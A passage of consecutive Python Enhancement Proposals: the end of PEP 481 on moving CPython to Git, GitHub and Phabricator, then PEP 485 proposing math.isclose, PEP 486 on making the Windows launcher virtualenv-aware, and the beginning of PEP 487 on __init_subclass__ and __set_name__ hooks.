errored, or failure state. This makes it easy to see inline if the pull request
is passing all of the tests, if the contributor has signed a CLA, etc.
Actually merging a Github Pull Request is quite simple, a core reviewer simply
needs to press the “Merge” button once the status of all the checks on the
Pull Request are green for successful.
GitHub also has a good workflow for submitting pull requests to a project
completely through their web interface. This would enable the Python
documentation to have “Edit on GitHub” buttons on every page and people who
discover things like typos, inaccuracies, or just want to make improvements to
the docs they are currently writing can simply hit that button and get an in
browser editor that will let them make changes and submit a pull request all
from the comfort of their browser.
Phabricator
In addition to GitHub Pull Requests this PEP also proposes setting up a
Phabricator instance and pointing it at the GitHub hosted repositories. This
will allow utilizing the Phabricator review applications of Differential and
Audit.
Differential functions similarly to GitHub pull requests except that they
require installing the arc command line tool to upload patches to
Phabricator.
Whether to enable Phabricator for any particular repository can be chosen on
a case-by-case basis, this PEP only proposes that it must be enabled for the
CPython repository, however for smaller repositories such as the PEP repository
it may not be worth the effort.
Criticism
X is not written in Python
One feature that the current tooling (Mercurial, Rietveld) has is that the
primary language for all of the pieces are written in Python. It is this PEPs
belief that we should focus on the best tools for the job and not the best
tools that happen to be written in Python. Volunteer time is a precious
resource to any open source project and we can best respect and utilize that
time by focusing on the benefits and downsides of the tools themselves rather
than what language their authors happened to write them in.
One concern is the ability to modify tools to work for us, however one of
the Goals here is to not modify software to work for us and instead adapt
ourselves to a more standard workflow. This standardization pays off in the
ability to re-use tools out of the box freeing up developer time to actually
work on Python itself as well as enabling knowledge sharing between projects.
However, if we do need to modify the tooling, Git itself is largely written in
C the same as CPython itself is. It can also have commands written for it using
any language, including Python. Phabricator is written in PHP which is a fairly
common language in the web world and fairly easy to pick up. GitHub itself is
largely written in Ruby but given that it’s not Open Source there is no ability
to modify it so it’s implementation language is completely meaningless.
GitHub is not Free/Open Source
GitHub is a big part of this proposal and someone who tends more to ideology
rather than practicality may be opposed to this PEP on that grounds alone. It
is this PEPs belief that while using entirely Free/Open Source software is an
attractive idea and a noble goal, that valuing the time of the contributors by
giving them good tooling that is well maintained and that they either already
know or if they learn it they can apply to other projects is a more important
concern than treating whether something is Free/Open Source is a hard
requirement.
However, history has shown us that sometimes benevolent proprietary companies
can stop being benevolent. This is hedged against in a few ways:
We are not utilizing the GitHub Issue Tracker, both because it is not
powerful enough for CPython but also because for the primary CPython
repository the ability to take our issues and put them somewhere else if we
ever need to leave GitHub relies on GitHub continuing to allow API access.
We are utilizing the GitHub Pull Request workflow, however all of those
changes live inside of Git. So a mirror of the GitHub repositories can easily
contain all of those Pull Requests. We would potentially lose any comments if
GitHub suddenly turned “evil”, but the changes themselves would still exist.
We are utilizing the GitHub repository hosting feature, however since this is
just git moving away from GitHub is as simple as pushing the repository to
a different location. Data portability for the repository itself is extremely
high.
We are also utilizing Phabricator to provide an alternative for people who
do not wish to use GitHub. This also acts as a fallback option which will
already be in place if we ever need to stop using GitHub.
Relying on GitHub comes with a number of benefits beyond just the benefits of
the platform itself. Since it is a commercially backed venture it has a full-time
staff responsible for maintaining its services. This includes making sure
they stay up, making sure they stay patched for various security
vulnerabilities, and further improving the software and infrastructure as time
goes on.
Mercurial is better than Git
Whether Mercurial or Git is better on a technical level is a highly subjective
opinion. This PEP does not state whether the mechanics of Git or Mercurial is
better and instead focuses on the network effect that is available for either
option. Since this PEP proposes switching to Git this leaves the people who
prefer Mercurial out, however those users can easily continue to work with
Mercurial by using the hg-git [2] extension for Mercurial which will
let it work with a repository which is Git on the serverside.
CPython Workflow is too Complicated
One sentiment that came out of previous discussions was that the multi branch
model of CPython was too complicated for Github Pull Requests. It is the belief
of this PEP that statement is not accurate.
Currently any particular change requires manually creating a patch for 2.7 and
3.x which won’t change at all in this regards.
If someone submits a fix for the current stable branch (currently 3.4) the
GitHub Pull Request workflow can be used to create, in the browser, a Pull
Request to merge the current stable branch into the master branch (assuming
there is no merge conflicts). If there is a merge conflict that would need to
be handled locally. This provides an improvement over the current situation
where the merge must always happen locally.
Finally if someone submits a fix for the current development branch currently
then this has to be manually applied to the stable branch if it desired to
include it there as well. This must also happen locally as well in the new
workflow, however for minor changes it could easily be accomplished in the
GitHub web editor.
Looking at this, I do not believe that any system can hide the complexities
involved in maintaining several long running branches. The only thing that the
tooling can do is make it as easy as possible to submit changes.
Example: Scientific Python
One of the key ideas behind the move to both git and Github is that a feature
of a DVCS, the repository hosting, and the workflow used is the social network
and size of the community using said tools. We can see this is true by looking
at an example from a sub-community of the Python community: The Scientific
Python community. They have already migrated most of the key pieces of the
SciPy stack onto Github using the Pull Request-based workflow. This process
started with IPython, and as more projects moved over it became a natural
default for new projects in the community.
They claim to have seen a great benefit from this move, in that it enables
casual contributors to easily move between different projects within their
sub-community without having to learn a special, bespoke workflow and a
different toolchain for each project. They’ve found that when people can use
their limited time on actually contributing instead of learning the different
tools and workflows, not only do they contribute more to one project, but
that they also expand out and contribute to other projects. This move has also
been attributed to the increased tendency for members of that community to go
so far as publishing their research and educational materials on Github as
well.
This example showcases the real power behind moving to a highly popular
toolchain and workflow, as each variance introduces yet another hurdle for new
and casual contributors to get past and it makes the time spent learning that
workflow less reusable with other projects.
References
[1]
Open Hub Statistics
[2]
Hg-Git mercurial plugin
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 481 – Migrate CPython to Git, Github, and Phabricator | Process | Note |
PEP 485 – A Function for testing approximate equality
Author:
Christopher Barker <PythonCHB at gmail.com>
Status:
Final
Type:
Standards Track
Created:
20-Jan-2015
Python-Version:
3.5
Post-History:
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Existing Implementations
Proposed Implementation
Handling of non-finite numbers
Non-float types
Behavior near zero
Implementation
Relative Difference
How much difference does it make?
Symmetry
Which symmetric test?
Large Tolerances
Defaults
Relative Tolerance Default
Absolute tolerance default
Expected Uses
Inappropriate uses
Other Approaches
unittest.TestCase.assertAlmostEqual
numpy isclose()
Boost floating-point comparison
Alternate Proposals
A Recipe
zero_tol
No absolute tolerance
Other tests
References
Copyright
Abstract
This PEP proposes the addition of an isclose() function to the standard
library math module that determines whether one value is approximately equal
or “close” to another value.
Rationale
Floating point values contain limited precision, which results in
their being unable to exactly represent some values, and for errors to
accumulate with repeated computation. As a result, it is common
advice to only use an equality comparison in very specific situations.
Often an inequality comparison fits the bill, but there are times
(often in testing) where the programmer wants to determine whether a
computed value is “close” to an expected value, without requiring them
to be exactly equal. This is common enough, particularly in testing,
and not always obvious how to do it, that it would be useful addition to
the standard library.
Existing Implementations
The standard library includes the unittest.TestCase.assertAlmostEqual
method, but it:
Is buried in the unittest.TestCase class
Is an assertion, so you can’t use it as a general test at the command
line, etc. (easily)
Is an absolute difference test. Often the measure of difference
requires, particularly for floating point numbers, a relative error,
i.e. “Are these two values within x% of each-other?”, rather than an
absolute error. Particularly when the magnitude of the values is
unknown a priori.
The numpy package has the allclose() and isclose() functions,
but they are only available with numpy.
The statistics package tests include an implementation, used for its
unit tests.
One can also find discussion and sample implementations on Stack
Overflow and other help sites.
Many other non-python systems provide such a test, including the Boost C++
library and the APL language [4].
These existing implementations indicate that this is a common need and
not trivial to write oneself, making it a candidate for the standard
library.
Proposed Implementation
NOTE: this PEP is the result of extended discussions on the
python-ideas list [1].
The new function will go into the math module, and have the following
signature:
isclose(a, b, rel_tol=1e-9, abs_tol=0.0)
a and b: are the two values to be tested to relative closeness
rel_tol: is the relative tolerance – it is the amount of error
allowed, relative to the larger absolute value of a or b. For example,
to set a tolerance of 5%, pass tol=0.05. The default tolerance is 1e-9,
which assures that the two values are the same within about 9 decimal
digits. rel_tol must be greater than 0.0
abs_tol: is a minimum absolute tolerance level – useful for
comparisons near zero.
Modulo error checking, etc, the function will return the result of:
abs(a-b) <= max( rel_tol * max(abs(a), abs(b)), abs_tol )
The name, isclose, is selected for consistency with the existing
isnan and isinf.
Handling of non-finite numbers
The IEEE 754 special values of NaN, inf, and -inf will be handled
according to IEEE rules. Specifically, NaN is not considered close to
any other value, including NaN. inf and -inf are only considered close
to themselves.
Non-float types
The primary use-case is expected to be floating point numbers.
However, users may want to compare other numeric types similarly. In
theory, it should work for any type that supports abs(),
multiplication, comparisons, and subtraction. However, the implementation
in the math module is written in C, and thus can not (easily) use python’s
duck typing. Rather, the values passed into the function will be converted
to the float type before the calculation is performed. Passing in types
(or values) that cannot be converted to floats will raise an appropriate
Exception (TypeError, ValueError, or OverflowError).
The code will be tested to accommodate at least some values of these types:
Decimal
int
Fraction
complex: For complex, a companion function will be added to the
cmath module. In cmath.isclose(), the tolerances are specified
as floats, and the absolute value of the complex values
will be used for scaling and comparison. If a complex tolerance is
passed in, the absolute value will be used as the tolerance.
NOTE: it may make sense to add a Decimal.isclose() that works properly and
completely with the decimal type, but that is not included as part of this PEP.
Behavior near zero
Relative comparison is problematic if either value is zero. By
definition, no value is small relative to zero. And computationally,
if either value is zero, the difference is the absolute value of the
other value, and the computed absolute tolerance will be rel_tol
times that value. When rel_tol is less than one, the difference will
never be less than the tolerance.
However, while mathematically correct, there are many use cases where
a user will need to know if a computed value is “close” to zero. This
calls for an absolute tolerance test. If the user needs to call this
function inside a loop or comprehension, where some, but not all, of
the expected values may be zero, it is important that both a relative
tolerance and absolute tolerance can be tested for with a single
function with a single set of parameters.
There is a similar issue if the two values to be compared straddle zero:
if a is approximately equal to -b, then a and b will never be computed
as “close”.
To handle this case, an optional parameter, abs_tol can be
used to set a minimum tolerance used in the case of very small or zero
computed relative tolerance. That is, the values will be always be
considered close if the difference between them is less than
abs_tol
The default absolute tolerance value is set to zero because there is
no value that is appropriate for the general case. It is impossible to
know an appropriate value without knowing the likely values expected
for a given use case. If all the values tested are on order of one,
then a value of about 1e-9 might be appropriate, but that would be far
too large if expected values are on order of 1e-9 or smaller.
Any non-zero default might result in user’s tests passing totally
inappropriately. If, on the other hand, a test against zero fails the
first time with defaults, a user will be prompted to select an
appropriate value for the problem at hand in order to get the test to
pass.
NOTE: that the author of this PEP has resolved to go back over many of
his tests that use the numpy allclose() function, which provides
a default absolute tolerance, and make sure that the default value is
appropriate.
If the user sets the rel_tol parameter to 0.0, then only the
absolute tolerance will effect the result. While not the goal of the
function, it does allow it to be used as a purely absolute tolerance
check as well.
Implementation
A sample implementation in python is available (as of Jan 22, 2015) on
gitHub:
https://github.com/PythonCHB/close_pep/blob/master/is_close.py
This implementation has a flag that lets the user select which
relative tolerance test to apply – this PEP does not suggest that
that be retained, but rather that the weak test be selected.
There are also drafts of this PEP and test code, etc. there:
https://github.com/PythonCHB/close_pep
Relative Difference
There are essentially two ways to think about how close two numbers
are to each-other:
Absolute difference: simply abs(a-b)
Relative difference: abs(a-b)/scale_factor [2].
The absolute difference is trivial enough that this proposal focuses
on the relative difference.
Usually, the scale factor is some function of the values under
consideration, for instance:
The absolute value of one of the input values
The maximum absolute value of the two
The minimum absolute value of the two.
The absolute value of the arithmetic mean of the two
These lead to the following possibilities for determining if two
values, a and b, are close to each other.
abs(a-b) <= tol*abs(a)
abs(a-b) <= tol * max( abs(a), abs(b) )
abs(a-b) <= tol * min( abs(a), abs(b) )
abs(a-b) <= tol * abs(a + b)/2
NOTE: (2) and (3) can also be written as:
(abs(a-b) <= abs(tol*a)) or (abs(a-b) <= abs(tol*b))
(abs(a-b) <= abs(tol*a)) and (abs(a-b) <= abs(tol*b))
(Boost refers to these as the “weak” and “strong” formulations [3])
These can be a tiny bit more computationally efficient, and thus are
used in the example code.
Each of these formulations can lead to slightly different results.
However, if the tolerance value is small, the differences are quite
small. In fact, often less than available floating point precision.
How much difference does it make?
When selecting a method to determine closeness, one might want to know
how much of a difference it could make to use one test or the other
– i.e. how many values are there (or what range of values) that will
pass one test, but not the other.
The largest difference is between options (2) and (3) where the
allowable absolute difference is scaled by either the larger or
smaller of the values.
Define delta to be the difference between the allowable absolute
tolerance defined by the larger value and that defined by the smaller
value. That is, the amount that the two input values need to be
different in order to get a different result from the two tests.
tol is the relative tolerance value.
Assume that a is the larger value and that both a and b
are positive, to make the analysis a bit easier. delta is
therefore:
delta = tol * (a-b)
or:
delta / tol = (a-b)
The largest absolute difference that would pass the test: (a-b),
equals the tolerance times the larger value:
(a-b) = tol * a
Substituting into the expression for delta:
delta / tol = tol * a
so:
delta = tol**2 * a
For example, for a = 10, b = 9, tol = 0.1 (10%):
maximum tolerance tol * a == 0.1 * 10 == 1.0
minimum tolerance tol * b == 0.1 * 9.0 == 0.9
delta = (1.0 - 0.9) = 0.1 or tol**2 * a = 0.1**2 * 10 = .1
The absolute difference between the maximum and minimum tolerance
tests in this case could be substantial. However, the primary use
case for the proposed function is testing the results of computations.
In that case a relative tolerance is likely to be selected of much
smaller magnitude.
For example, a relative tolerance of 1e-8 is about half the
precision available in a python float. In that case, the difference
between the two tests is 1e-8**2 * a or 1e-16 * a, which is
close to the limit of precision of a python float. If the relative
tolerance is set to the proposed default of 1e-9 (or smaller), the
difference between the two tests will be lost to the limits of
precision of floating point. That is, each of the four methods will
yield exactly the same results for all values of a and b.
In addition, in common use, tolerances are defined to 1 significant
figure – that is, 1e-9 is specifying about 9 decimal digits of
accuracy. So the difference between the various possible tests is well
below the precision to which the tolerance is specified.
Symmetry
A relative comparison can be either symmetric or non-symmetric. For a
symmetric algorithm:
isclose(a,b) is always the same as isclose(b,a)
If a relative closeness test uses only one of the values (such as (1)
above), then the result is asymmetric, i.e. isclose(a,b) is not
necessarily the same as isclose(b,a).
Which approach is most appropriate depends on what question is being
asked. If the question is: “are these two numbers close to each
other?”, there is no obvious ordering, and a symmetric test is most
appropriate.
However, if the question is: “Is the computed value within x% of this
known value?”, then it is appropriate to scale the tolerance to the
known value, and an asymmetric test is most appropriate.
From the previous section, it is clear that either approach would
yield the same or similar results in the common use cases. In that
case, the goal of this proposal is to provide a function that is least
likely to produce surprising results.
The symmetric approach provide an appealing consistency – it
mirrors the symmetry of equality, and is less likely to confuse
people. A symmetric test also relieves the user of the need to think
about the order in which to set the arguments. It was also pointed
out that there may be some cases where the order of evaluation may not
be well defined, for instance in the case of comparing a set of values
all against each other.
There may be cases when a user does need to know that a value is
within a particular range of a known value. In that case, it is easy
enough to simply write the test directly:
if a-b <= tol*a:
(assuming a > b in this case). There is little need to provide a
function for this particular case.
This proposal uses a symmetric test.
Which symmetric test?
There are three symmetric tests considered:
The case that uses the arithmetic mean of the two values requires that
the value be either added together before dividing by 2, which could
result in extra overflow to inf for very large numbers, or require
each value to be divided by two before being added together, which
could result in underflow to zero for very small numbers. This effect
would only occur at the very limit of float values, but it was decided
there was no benefit to the method worth reducing the range of
functionality or adding the complexity of checking values to determine
the order of computation.
This leaves the boost “weak” test (2)– or using the larger value to
scale the tolerance, or the Boost “strong” (3) test, which uses the
smaller of the values to scale the tolerance. For small tolerance,
they yield the same result, but this proposal uses the boost “weak”
test case: it is symmetric and provides a more useful result for very
large tolerances.
Large Tolerances
The most common use case is expected to be small tolerances – on order of the
default 1e-9. However, there may be use cases where a user wants to know if two
fairly disparate values are within a particular range of each other: “is a
within 200% (rel_tol = 2.0) of b? In this case, the strong test would never
indicate that two values are within that range of each other if one of them is
zero. The weak case, however would use the larger (non-zero) value for the
test, and thus return true if one value is zero. For example: is 0 within 200%
of 10? 200% of ten is 20, so the range within 200% of ten is -10 to +30. Zero
falls within that range, so it will return True.
Defaults
Default values are required for the relative and absolute tolerance.
Relative Tolerance Default
The relative tolerance required for two values to be considered
“close” is entirely use-case dependent. Nevertheless, the relative
tolerance needs to be greater than 1e-16 (approximate precision of a
python float). The value of 1e-9 was selected because it is the
largest relative tolerance for which the various possible methods will
yield the same result, and it is also about half of the precision
available to a python float. In the general case, a good numerical
algorithm is not expected to lose more than about half of available
digits of accuracy, and if a much larger tolerance is acceptable, the
user should be considering the proper value in that case. Thus 1e-9 is
expected to “just work” for many cases.
Absolute tolerance default
The absolute tolerance value will be used primarily for comparing to
zero. The absolute tolerance required to determine if a value is
“close” to zero is entirely use-case dependent. There is also
essentially no bounds to the useful range – expected values would
conceivably be anywhere within the limits of a python float. Thus a
default of 0.0 is selected.
If, for a given use case, a user needs to compare to zero, the test
will be guaranteed to fail the first time, and the user can select an
appropriate value.
It was suggested that comparing to zero is, in fact, a common use case
(evidence suggest that the numpy functions are often used with zero).
In this case, it would be desirable to have a “useful” default. Values
around 1e-8 were suggested, being about half of floating point
precision for values of around value 1.
However, to quote The Zen: “In the face of ambiguity, refuse the
temptation to guess.” Guessing that users will most often be concerned
with values close to 1.0 would lead to spurious passing tests when used
with smaller values – this is potentially more damaging than
requiring the user to thoughtfully select an appropriate value.
Expected Uses
The primary expected use case is various forms of testing – “are the
results computed near what I expect as a result?” This sort of test
may or may not be part of a formal unit testing suite. Such testing
could be used one-off at the command line, in an IPython notebook,
part of doctests, or simple asserts in an if __name__ == "__main__"
block.
It would also be an appropriate function to use for the termination
criteria for a simple iterative solution to an implicit function:
guess = something
while True:
new_guess = implicit_function(guess, *args)
if isclose(new_guess, guess):
break
guess = new_guess
Inappropriate uses
One use case for floating point comparison is testing the accuracy of
a numerical algorithm. However, in this case, the numerical analyst
ideally would be doing careful error propagation analysis, and should
understand exactly what to test for. It is also likely that ULP (Unit
in the Last Place) comparison may be called for. While this function
may prove useful in such situations, It is not intended to be used in
that way without careful consideration.
Other Approaches
unittest.TestCase.assertAlmostEqual
(https://docs.python.org/3/library/unittest.html#unittest.TestCase.assertAlmostEqual)
Tests that values are approximately (or not approximately) equal by
computing the difference, rounding to the given number of decimal
places (default 7), and comparing to zero.
This method is purely an absolute tolerance test, and does not address
the need for a relative tolerance test.
numpy isclose()
http://docs.scipy.org/doc/numpy-dev/reference/generated/numpy.isclose.html
The numpy package provides the vectorized functions isclose() and
allclose(), for similar use cases as this proposal:
isclose(a, b, rtol=1e-05, atol=1e-08, equal_nan=False)
Returns a boolean array where two arrays are element-wise equal
within a tolerance.The tolerance values are positive, typically very small numbers.
The relative difference (rtol * abs(b)) and the absolute
difference atol are added together to compare against the
absolute difference between a and b
In this approach, the absolute and relative tolerance are added
together, rather than the or method used in this proposal. This is
computationally more simple, and if relative tolerance is larger than
the absolute tolerance, then the addition will have no effect. However,
if the absolute and relative tolerances are of similar magnitude, then
the allowed difference will be about twice as large as expected.
This makes the function harder to understand, with no computational
advantage in this context.
Even more critically, if the values passed in are small compared to
the absolute tolerance, then the relative tolerance will be
completely swamped, perhaps unexpectedly.
This is why, in this proposal, the absolute tolerance defaults to zero
– the user will be required to choose a value appropriate for the
values at hand.
Boost floating-point comparison
The Boost project ( [3] ) provides a floating point comparison
function. It is a symmetric approach, with both “weak” (larger of the
two relative errors) and “strong” (smaller of the two relative errors)
options. This proposal uses the Boost “weak” approach. There is no
need to complicate the API by providing the option to select different
methods when the results will be similar in most cases, and the user
is unlikely to know which to select in any case.
Alternate Proposals
A Recipe
The primary alternate proposal was to not provide a standard library
function at all, but rather, provide a recipe for users to refer to.
This would have the advantage that the recipe could provide and
explain the various options, and let the user select that which is
most appropriate. However, that would require anyone needing such a
test to, at the very least, copy the function into their code base,
and select the comparison method to use.
zero_tol
One possibility was to provide a zero tolerance parameter, rather than
the absolute tolerance parameter. This would be an absolute tolerance
that would only be applied in the case of one of the arguments being
exactly zero. This would have the advantage of retaining the full
relative tolerance behavior for all non-zero values, while allowing
tests against zero to work. However, it would also result in the
potentially surprising result that a small value could be “close” to
zero, but not “close” to an even smaller value. e.g., 1e-10 is “close”
to zero, but not “close” to 1e-11.
No absolute tolerance
Given the issues with comparing to zero, another possibility would
have been to only provide a relative tolerance, and let comparison to
zero fail. In this case, the user would need to do a simple absolute
test: abs(val) < zero_tol in the case where the comparison involved
zero.
However, this would not allow the same call to be used for a sequence
of values, such as in a loop or comprehension. Making the function far
less useful. It is noted that the default abs_tol=0.0 achieves the
same effect if the default is not overridden.
Other tests
The other tests considered are all discussed in the Relative Error
section above.
References
[1]
Python-ideas list discussion threadshttps://mail.python.org/pipermail/python-ideas/2015-January/030947.html
https://mail.python.org/pipermail/python-ideas/2015-January/031124.html
https://mail.python.org/pipermail/python-ideas/2015-January/031313.html
[2]
Wikipedia page on relative differencehttp://en.wikipedia.org/wiki/Relative_change_and_difference
[3] (1, 2)
Boost project floating-point comparison algorithmshttp://www.boost.org/doc/libs/1_35_0/libs/test/doc/components/test_tools/floating_point_comparison.html
[4]
1976. R. H. Lathwell. APL comparison tolerance. Proceedings of
the eighth international conference on APL Pages 255 - 258http://dl.acm.org/citation.cfm?doid=800114.803685
Copyright
This document has been placed in the public domain.
| Final | PEP 485 – A Function for testing approximate equality | Standards Track | This PEP proposes the addition of an isclose() function to the standard
library math module that determines whether one value is approximately equal
or “close” to another value. |
PEP 486 – Make the Python Launcher aware of virtual environments
Author:
Paul Moore <p.f.moore at gmail.com>
Status:
Final
Type:
Standards Track
Created:
12-Feb-2015
Python-Version:
3.5
Post-History:
12-Feb-2015
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Impact on Script Launching
Exclusions
Reference Implementation
References
Copyright
Abstract
The Windows installers for Python include a launcher that locates the
correct Python interpreter to run (see PEP 397). However, the
launcher is not aware of virtual environments (virtualenv [1] or PEP
405 based), and so cannot be used to run commands from the active
virtualenv.
This PEP proposes making the launcher “virtualenv aware”. This means
that when run without specifying an explicit Python interpreter to
use, the launcher will use the currently active virtualenv, if any,
before falling back to the configured default Python.
Rationale
Windows users with multiple copies of Python installed need a means of
selecting which one to use. The Python launcher provides this
facility by means of a py command that can be used to run either a
configured “default” Python or a specific interpreter, by means of
command line arguments. So typical usage would be:
# Run the Python interactive interpreter
py
# Execute an installed module
py -m pip install pytest
py -m pytest
When using virtual environments, the py launcher is unaware that a
virtualenv is active, and will continue to use the system Python. So
different command invocations are needed to run the same commands in a
virtualenv:
# Run the Python interactive interpreter
python
# Execute an installed module (these could use python -m,
# which is longer to type but is a little more similar to the
# launcher approach)
pip install pytest
py.test
Having to use different commands is error-prone, and in many cases
the error is difficult to spot immediately. The PEP proposes making
the py command usable with virtual environments, so that the first
form of command can be used in all cases.
Implementation
Both virtualenv and the core venv module set an environment
variable VIRTUAL_ENV when activating a virtualenv. This PEP
proposes that the launcher checks for the VIRTUAL_ENV environment
variable whenever it would run the “default” Python interpreter for
the system (i.e., when no specific version flags such as py -2.7
are used) and if present, run the Python interpreter for the
virtualenv rather than the default system Python.
The “default” Python interpreter referred to above is (as per PEP 397)
either the latest version of Python installed on the system, or
a version configured via the py.ini configuration file. When the
user specifies an explicit Python version on the command line, this
will always be used (as at present).
Impact on Script Launching
As well as interactive use, the launcher is used as the Windows file
association for Python scripts. In that case, a “shebang” (#!)
line at the start of the script is used to identify the interpreter to
run. A fully-qualified path can be used, or a version-specific Python
(python3 or python2, or even python3.5), or the generic
python, which means to use the default interpreter.
The launcher also looks for the specific shebang line
#!/usr/bin/env python. On Unix, the env program searches for a
command on $PATH and runs the command so located. Similarly, with
this shebang line, the launcher will look for a copy of python.exe
on the user’s current %PATH% and will run that copy.
As activating a virtualenv means that it is added to PATH, no
special handling is needed to run scripts with the active virtualenv -
they just need to use the #!/usr/bin/env python shebang line,
exactly as on Unix. (If there is no activated virtualenv, and no
python.exe on PATH, the launcher will look for a default
Python exactly as if the shebang line had said #!python).
Exclusions
The PEP makes no attempt to promote the use of the launcher for
running Python on Windows. Most existing documentation assumes the
user of python as the command to run Python, and (for example)
pip to run an installed Python command. This documentation is not
expected to change, and users who choose to manage their PATH
environment variable can continue to use this form. The focus of this
PEP is purely on allowing users who prefer to use the launcher when
dealing with their system Python installations, to be able to continue
to do so when using virtual environments.
Reference Implementation
A patch implementing the proposed behaviour is available at
http://bugs.python.org/issue23465
References
[1]
https://virtualenv.pypa.io/
Copyright
This document has been placed in the public domain.
| Final | PEP 486 – Make the Python Launcher aware of virtual environments | Standards Track | The Windows installers for Python include a launcher that locates the
correct Python interpreter to run (see PEP 397). However, the
launcher is not aware of virtual environments (virtualenv [1] or PEP
405 based), and so cannot be used to run commands from the active
virtualenv. |
PEP 487 – Simpler customisation of class creation
Author:
Martin Teichmann <lkb.teichmann at gmail.com>
Status:
Final
Type:
Standards Track
Created:
27-Feb-2015
Python-Version:
3.6
Post-History:
27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016
Replaces:
422
Resolution:
Python-Dev message
Table of Contents
Abstract
Background
Proposal
Key Benefits
Easier inheritance of definition time behaviour
Reduced chance of metaclass conflicts
New Ways of Using Classes
Subclass registration
Trait descriptors
Implementation Details
Reference Implementation
Backward compatibility issues
Rejected Design Options
Calling the hook on the class itself
Other variants of calling the hooks
Requiring an explicit decorator on __init_subclass__
A more __new__-like hook
Adding a class attribute with the attribute order
History
Copyright
Abstract
Currently, customising class creation requires the use of a custom metaclass.
This custom metaclass then persists for the entire lifecycle of the class,
creating the potential for spurious metaclass conflicts.
This PEP proposes to instead support a wide range of customisation
scenarios through a new __init_subclass__ hook in the class body,
and a hook to initialize attributes.
The new mechanism should be easier to understand and use than
implementing a custom metaclass, and thus should provide a gentler
introduction to the full power of Python’s metaclass machinery.
Background
Metaclasses are a powerful tool to customize class creation. They have,
however, the problem that there is no automatic way to combine metaclasses.
If one wants to use two metaclasses for a class, a new metaclass combining
those two needs to be created, typically manually.
This need often occurs as a surprise to a user: inheriting from two base
classes coming from two different libraries suddenly raises the necessity
to manually create a combined metaclass, where typically one is not
interested in those details about the libraries at all. This becomes
even worse if one library starts to make use of a metaclass which it
has not done before. While the library itself continues to work perfectly,
suddenly every code combining those classes with classes from another library
fails.
Proposal
While there are many possible ways to use a metaclass, the vast majority
of use cases falls into just three categories: some initialization code
running after class creation, the initialization of descriptors and
keeping the order in which class attributes were defined.
The first two categories can easily be achieved by having simple hooks
into the class creation:
An __init_subclass__ hook that initializes
all subclasses of a given class.
upon class creation, a __set_name__ hook is called on all the
attribute (descriptors) defined in the class, and
The third category is the topic of another PEP, PEP 520.
As an example, the first use case looks as follows:
>>> class QuestBase:
... # this is implicitly a @classmethod (see below for motivation)
... def __init_subclass__(cls, swallow, **kwargs):
... cls.swallow = swallow
... super().__init_subclass__(**kwargs)
>>> class Quest(QuestBase, swallow="african"):
... pass
>>> Quest.swallow
'african'
The base class object contains an empty __init_subclass__
method which serves as an endpoint for cooperative multiple inheritance.
Note that this method has no keyword arguments, meaning that all
methods which are more specialized have to process all keyword
arguments.
This general proposal is not a new idea (it was first suggested for
inclusion in the language definition more than 10 years ago, and a
similar mechanism has long been supported by Zope’s ExtensionClass),
but the situation has changed sufficiently in recent years that
the idea is worth reconsidering for inclusion.
The second part of the proposal adds an __set_name__
initializer for class attributes, especially if they are descriptors.
Descriptors are defined in the body of a
class, but they do not know anything about that class, they do not
even know the name they are accessed with. They do get to know their
owner once __get__ is called, but still they do not know their
name. This is unfortunate, for example they cannot put their
associated value into their object’s __dict__ under their name,
since they do not know that name. This problem has been solved many
times, and is one of the most important reasons to have a metaclass in
a library. While it would be easy to implement such a mechanism using
the first part of the proposal, it makes sense to have one solution
for this problem for everyone.
To give an example of its usage, imagine a descriptor representing weak
referenced values:
import weakref
class WeakAttribute:
def __get__(self, instance, owner):
return instance.__dict__[self.name]()
def __set__(self, instance, value):
instance.__dict__[self.name] = weakref.ref(value)
# this is the new initializer:
def __set_name__(self, owner, name):
self.name = name
Such a WeakAttribute may, for example, be used in a tree structure
where one wants to avoid cyclic references via the parent:
class TreeNode:
parent = WeakAttribute()
def __init__(self, parent):
self.parent = parent
Note that the parent attribute is used like a normal attribute,
yet the tree contains no cyclic references and can thus be easily
garbage collected when out of use. The parent attribute magically
becomes None once the parent ceases existing.
While this example looks very trivial, it should be noted that until
now such an attribute cannot be defined without the use of a metaclass.
And given that such a metaclass can make life very hard, this kind of
attribute does not exist yet.
Initializing descriptors could simply be done in the
__init_subclass__ hook. But this would mean that descriptors can
only be used in classes that have the proper hook, the generic version
like in the example would not work generally. One could also call
__set_name__ from within the base implementation of
object.__init_subclass__. But given that it is a common mistake
to forget to call super(), it would happen too often that suddenly
descriptors are not initialized.
Key Benefits
Easier inheritance of definition time behaviour
Understanding Python’s metaclasses requires a deep understanding of
the type system and the class construction process. This is legitimately
seen as challenging, due to the need to keep multiple moving parts (the code,
the metaclass hint, the actual metaclass, the class object, instances of the
class object) clearly distinct in your mind. Even when you know the rules,
it’s still easy to make a mistake if you’re not being extremely careful.
Understanding the proposed implicit class initialization hook only requires
ordinary method inheritance, which isn’t quite as daunting a task. The new
hook provides a more gradual path towards understanding all of the phases
involved in the class definition process.
Reduced chance of metaclass conflicts
One of the big issues that makes library authors reluctant to use metaclasses
(even when they would be appropriate) is the risk of metaclass conflicts.
These occur whenever two unrelated metaclasses are used by the desired
parents of a class definition. This risk also makes it very difficult to
add a metaclass to a class that has previously been published without one.
By contrast, adding an __init_subclass__ method to an existing type poses
a similar level of risk to adding an __init__ method: technically, there
is a risk of breaking poorly implemented subclasses, but when that occurs,
it is recognised as a bug in the subclass rather than the library author
breaching backwards compatibility guarantees.
New Ways of Using Classes
Subclass registration
Especially when writing a plugin system, one likes to register new
subclasses of a plugin baseclass. This can be done as follows:
class PluginBase:
subclasses = []
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
cls.subclasses.append(cls)
In this example, PluginBase.subclasses will contain a plain list of all
subclasses in the entire inheritance tree. One should note that this also
works nicely as a mixin class.
Trait descriptors
There are many designs of Python descriptors in the wild which, for
example, check boundaries of values. Often those “traits” need some support
of a metaclass to work. This is how this would look like with this
PEP:
class Trait:
def __init__(self, minimum, maximum):
self.minimum = minimum
self.maximum = maximum
def __get__(self, instance, owner):
return instance.__dict__[self.key]
def __set__(self, instance, value):
if self.minimum < value < self.maximum:
instance.__dict__[self.key] = value
else:
raise ValueError("value not in range")
def __set_name__(self, owner, name):
self.key = name
Implementation Details
The hooks are called in the following order: type.__new__ calls
